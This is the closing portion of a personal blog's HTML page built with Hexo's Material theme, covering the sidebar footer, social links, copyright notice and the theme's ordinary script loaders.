如果您仍然想删除的话 能否只保留第一项呢？即 "Theme Material"
它不会影响美观并可以给开发者很大的支持和动力。 :)
-->

<!-- Sidebar Divider -->

    <div class="sidebar-divider"></div>


<!-- Theme Material -->

    <a href="https://github.com/viosey/hexo-theme-material"  class="sidebar-footer-text-a" target="_blank">
        <div class="sidebar-text mdl-button mdl-js-button mdl-js-ripple-effect sidebar-footer-text-div" data-upgraded=",MaterialButton,MaterialRipple">
            主题 - Material
            <span class="sidebar-badge badge-circle">i</span>
        </div>
    </a>


<!-- Help & Support -->
<!--

-->

<!-- Feedback -->
<!--

-->

<!-- About Theme -->
<!--

-->

    </div>

    <!-- Sidebar Image -->
    

</aside>

                    

                    
                        <!-- Footer Top Button -->
                        <div id="back-to-top" class="toTop-wrap">
    <a href="#top" class="toTop">
        <i class="material-icons footer_top-i">expand_less</i>
    </a>
</div>

                    

                    <!--Footer-->
<footer class="mdl-mini-footer" id="bottom">
    
        <!-- Paradox Footer Left Section -->
        <div class="mdl-mini-footer--left-section sns-list">
    <!-- Twitter -->
    
        <a href="https://twitter.com/twitter" target="_blank">
            <button class="mdl-mini-footer--social-btn social-btn footer-sns-twitter">
                <span class="visuallyhidden">Twitter</span>
            </button><!--
     --></a>
    

    <!-- Facebook -->
    
        <a href="https://www.facebook.com/facebook" target="_blank">
            <button class="mdl-mini-footer--social-btn social-btn footer-sns-facebook">
                <span class="visuallyhidden">Facebook</span>
            </button><!--
     --></a>
    

    <!-- Google + -->
    
        <a href="https://www.google.com/" target="_blank">
            <button class="mdl-mini-footer--social-btn social-btn footer-sns-gplus">
                <span class="visuallyhidden">Google Plus</span>
            </button><!--
     --></a>
    

    <!-- Weibo -->
    

    <!-- Instagram -->
    

    <!-- Tumblr -->
    

    <!-- Github -->
    
        <a href="https://github.com/RingFall" target="_blank">
            <button class="mdl-mini-footer--social-btn social-btn footer-sns-github">
                <span class="visuallyhidden">Github</span>
            </button><!--
     --></a>
    

    <!-- LinkedIn -->
    

    <!-- Zhihu -->
    

    <!-- Bilibili -->
    

    <!-- Telegram -->
    
    
    <!-- V2EX -->
    
</div>


        <!--Copyright-->
        <div id="copyright">
            Copyright&nbsp;©<script type="text/javascript">var fd = new Date();document.write("&nbsp;" + fd.getFullYear() + "&nbsp;");</script>RingFa1l
            
        </div>

        <!-- Paradox Footer Right Section -->

        <!--
        I am glad you use this theme, the development is no so easy, I hope you can keep the copyright.
        It will not impact the appearance and can give developers a lot of support :)

        很高兴您使用该主题，开发不易，希望您可以保留一下版权声明。
        它不会影响美观并可以给开发者很大的支持。 :)
        -->

        <div class="mdl-mini-footer--right-section">
            <div>
                <div class="footer-develop-div">Powered by <a href="https://hexo.io" target="_blank" class="footer-develop-a">Hexo</a></div>
                <div class="footer-develop-div">Theme - <a href="https://github.com/viosey/hexo-theme-material" target="_blank" class="footer-develop-a">Material</a></div>
            </div>
        </div>
    
</footer>


                    <!-- Import JS File -->

    <script>lsloader.load("lazyload_js","/js/lazyload.min.js?1BcfzuNXqV+ntF6gq+5X3Q==", true)</script>



    <script>lsloader.load("js_js","/js/js.min.js?V/53wGualMuiPM3xoetD5Q==", true)</script>



    <script>lsloader.load("np_js","/js/nprogress.js?pl3Qhb9lvqR1FlyLUna1Yw==", true)</script>


<script type="text/ls-javascript" id="NProgress-script">
    NProgress.configure({
        showSpinner: true
    });
    NProgress.start();
    $('#nprogress .bar').css({
        'background': '#29d'
    });
    $('#nprogress .peg').css({
        'box-shadow': '0 0 10px #29d, 0 0 15px #29d'
    });
    $('#nprogress .spinner-icon').css({
        'border-top-color': '#29d',
        'border-left-color': '#29d'
    });
    setTimeout(function() {
        NProgress.done();
        $('.fade').removeClass('out');
    }, 800);
</script>













<!-- UC Browser Compatible -->
<script>
	var agent = navigator.userAgent.toLowerCase();
	if(agent.indexOf('ucbrowser')>0) {
		document.write('<link rel="stylesheet" href="/css/uc.css">');
	   alert('由于 UC 浏览器使用极旧的内核，而本网站使用了一些新的特性。\n为了您能更好的浏览，推荐使用 Chrome 或 Firefox 浏览器。');
	}
</script>

<!-- Import prettify js  -->



<!-- Window Load -->
<!-- add class for prettify -->
<script type="text/ls-javascript" id="window-load">
    $(window).on('load', function() {
        // Post_Toc parent position fixed
        $('.post-toc-wrap').parent('.mdl-menu__container').css('position', 'fixed');
    });

    
    
</script>

<!-- MathJax Load-->


<!-- Bing Background -->


<script type="text/ls-javascript" id="lazy-load">
    // Offer LazyLoad
    queue.offer(function(){
        $('.lazy').lazyload({
            effect : 'show'
        });
    });

    // Start Queue
    $(document).ready(function(){
        setInterval(function(){
            queue.execNext();
        },200);
    });
</script>

<!-- Custom Footer -->



<script>
    (function(){
        var scriptList = document.querySelectorAll('script[type="text/ls-javascript"]')

        for (var i = 0; i < scriptList.length; ++i) {
            var item = scriptList[i];
            lsloader.runInlineScript(item.id,item.id);
        }
    })()
console.log('\n %c © Material Theme | Version: 1.5.2 | https://github.com/viosey/hexo-theme-material %c \n', 'color:#455a64;background:#e0e0e0;padding:5px 0;border-top-left-radius:5px;border-bottom-left-radius:5px;', 'color:#455a64;background:#e0e0e0;padding:5px 0;border-top-right-radius:5px;border-bottom-right-radius:5px;');
</script>

                </main>
            </div>
        </body>
    
</html>
